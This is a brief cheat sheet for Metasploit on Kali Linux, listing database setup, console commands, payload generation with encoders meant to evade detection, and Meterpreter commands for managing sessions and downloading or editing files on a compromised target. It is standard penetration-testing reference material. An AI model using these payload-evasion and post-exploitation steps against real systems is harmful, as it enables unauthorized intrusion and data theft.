A quick reference for getting started with Metasploit in Kali Linux.

Metasploit Database

  1. Start PostgreSQL service postgresql start

  2. Create and Initilaize msf database msfdb init

  3. Start Metasploit msfconsole

  4. Ensure connected to DB db_status

  5. List available workspaces workspace

  6. switch workspace workspace $WORKSPACE

  7. Create workspace workspace -a $WORKSPACE

  8. Delete worksapce workspace -d $WORKSPACE

MSFconsole Interface

  • help OR ?
  • help $COMMAND
  • search $TERM
  • use $EXPLOIT_PATH

  • set = local

  • setg = global

  • unset

  • unsetg

Encoders

Generate a customized payload with settings set or changes to attempt detection evasion.

Example: - use payload/windows/shell_bind_tcp - set options, such as LHOST, LPORT, RHOST, etc - generate

Command options: - Remove troublesome shell code generate -b $HEX

  • Show available encoders show encoders

  • Generate with selected encoder generate -e $ENCODER

Database Commands

  • workspace
  • loot
  • services
  • hosts
  • db_import

Meterpreter

  • Send session to background background

  • List sessions sessions

  • Switch to the session number session -i $NUMBER

  • Copy remote file to local download $FILE

  • Edit remote file edit $FILE

  • Run locally available exploit on target run $EXPLOIT_PATH